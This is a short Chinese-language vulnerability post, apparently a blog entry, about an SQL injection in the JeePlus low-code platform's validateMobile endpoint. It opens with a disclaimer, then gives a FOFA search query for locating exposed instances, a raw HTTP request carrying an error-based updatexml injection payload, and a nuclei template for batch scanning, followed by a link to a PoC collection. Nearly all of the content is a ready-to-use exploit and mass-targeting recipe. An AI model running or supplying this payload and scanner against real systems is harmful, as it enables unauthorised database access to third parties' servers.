免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

JeePlus低代码开发平台存在SQL注入漏洞

fofa语句

app="JeePlus"

漏洞复现

打开页面

构造payload

GET /a/sys/user/validateMobile?mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
Connection: close

nuclei批量验证

id: JeePlus-SQLi

info:
  name: JeePlus低代码开发平台存在SQL注入漏洞
  author: changge
  severity: high
  description: |
    JeePlus低代码开发平台存在SQL注入漏洞
  metadata:
    fofa-query: app="JeePlus"
  reference:
    - https://127.0.0.1
  tags: auto

http:
  - raw:
      - |
        GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c4ca4238a0b923820dcc509a6f75849"

github poc总汇地址：https://github.com/AYcg/poc